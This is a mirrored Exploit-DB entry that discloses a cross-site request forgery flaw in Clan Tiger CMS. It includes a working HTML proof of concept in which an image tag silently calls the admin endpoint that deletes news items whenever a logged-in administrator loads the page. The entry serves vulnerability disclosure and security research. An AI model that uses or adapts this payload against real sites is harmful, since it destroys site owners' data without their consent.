bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/11780.html
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

41 lines
No EOL
1.3 KiB
HTML
Raw Blame History

=======================================================================
Clain_TIger_CMS CSRF Vulnerability
=======================================================================
# Vulnerability found in- Admin module
# email Pratulag@yahoo.com
# company aksitservices
# Credit by Pratul Agrawal
# Software Clan Tiger_CMS
# Category CMS / Portals
# Site p4ge http://server/clantiger/index.php?module=login
# Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)
# Proof of concept #
Targeted URL: http://servername/clantiger/
Script to Delete the News content through Cross Site request forgery
. ................................................................................................................
<html>
<body>
<img src=http://server/clantiger/index.php?module=news&action=remove&id=[user ID] />
</body>
</html>
. ..................................................................................................................
After execution refresh the page and u can see that a added content is deleted automatically.
Reference in a new issue View git blame Copy permalink